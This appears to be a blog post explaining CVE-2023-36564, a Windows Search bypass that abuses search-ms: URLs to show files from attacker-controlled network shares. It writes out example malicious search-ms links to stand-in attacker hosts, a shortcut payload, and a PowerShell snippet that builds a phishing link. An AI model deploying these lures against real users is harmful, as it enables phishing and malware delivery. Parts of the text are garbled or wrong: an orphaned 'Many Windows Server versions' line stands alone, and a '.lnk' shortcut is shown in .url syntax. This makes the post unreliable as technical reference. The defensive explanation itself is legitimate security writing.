CVE-2023-36564 - Exploring the Windows Search Security Feature Bypass Vulnerability

In October 2023, Microsoft published details on a new security issue labeled CVE-2023-36564. This vulnerability targets Windows’ built-in Search functionality, letting attackers bypass security controls and trick users into running remote malicious files. In this post, we’ll break down how this bug works, share code samples, and point you to more resources—using plain language throughout.

What Is CVE-2023-36564?

CVE-2023-36564 is a serious bug found in Microsoft Windows Search. In technical terms, it’s a "Security Feature Bypass Vulnerability". This means it lets an attacker get around security rules set up to protect your computer.

Specifically, an attacker can use a special URL to make Windows Search display content from an attacker-controlled remote server as if it were local. If a user clicks on certain links or file shares—say, from an email or phishing doc—they can be tricked into running a malicious file or revealing sensitive information without seeing the usual security warnings.

How Does the Exploit Work?

The trick is in how Windows handles search URLs. Windows supports a special URL protocol called search-ms:. Usually, this is used to search for files on your computer. But it’s possible to craft a malicious search-ms URL pointing to a remote location (like a hacker’s server).

When a user clicks this type of URL, Windows Search opens a window showing files from the remote server—without obvious warnings.

Example Exploit URL

search-ms:query=*.exe&crumb=location:C:\Users\Public\Documents

Now, the clever bit: make Windows Search look on a network share controlled by the attacker

search-ms:query=&crumb=location:\\attacker-server\shared-folder

A more weaponized example could use

search-ms:displayname=Important Documents&crumb=location:\\192.168.1.100\share

Or, in a shortcut file (.lnk), the attacker embeds

[InternetShortcut]
URL=search-ms:query=&crumb=location:\\malicious-server\payloads

When a victim clicks this link or opens the shortcut, Windows Search fetches and displays content from the attacker’s network share.

The victim sees a list of files stored on the attacker’s remote server.

- If the attacker names their file something tempting—like Invoice2023.pdf.exe—the victim might launch it, infecting their PC.

Here’s how an attacker might automate generation of a malicious link with PowerShell

$attackerServer = "\\192.168.1.123\malshare"
$searchURL = "search-ms:query=Invoice&crumb=location:$attackerServer"
Write-Output "Shareable Search link: $searchURL"

This prints

Shareable Search link: search-ms:query=Invoice&crumb=location:\\192.168.1.123\malshare

Many Windows Server versions

It is especially dangerous when users are tricked into clicking links in Office files, emails, browser popups, or via social engineering in chats.

No elevation required: Attackers don’t need admin access.

- Phishing and social engineering friendly: Attackers can easily lure victims with convincing file names and network paths.

Mitigations & Fixes

Microsoft patched this bug in October 2023. If you install the latest Windows updates, you’ll be protected.

You can read the official Microsoft advisory here

- Microsoft Security Update Guide - CVE-2023-36564

Temporary Workaround:
Block the search-ms and search: URL protocols using Windows Registry edits for extreme cases. See Microsoft’s mitigation steps in their advisory.

More Resources and References

- Microsoft Official Advisory for CVE-2023-36564
- Twitter Thread by Will Dormann (Security Researcher)
- The Record: Windows Security Flaw Under Attack
- Deep Dive on Practical Abuse by Huntress Labs

Conclusion

CVE-2023-36564 shows that sometimes, even a handy Windows feature can put users at risk if misused. The bug proved so dangerous because it abuses trust in Windows Search, lets attackers disguise networks shares as local, and makes phishing much more effective.

Block the search-ms: protocol if you don't need it.

Found this exclusive breakdown helpful? Share this post to spread the word!


Disclaimer: The information provided here is for educational and defensive purposes only. Don’t use this for unauthorized access or illegal activity. Always respect privacy and the law.

Timeline

Published on: 10/10/2023 18:15:13 UTC
Last modified on: 10/13/2023 18:57:13 UTC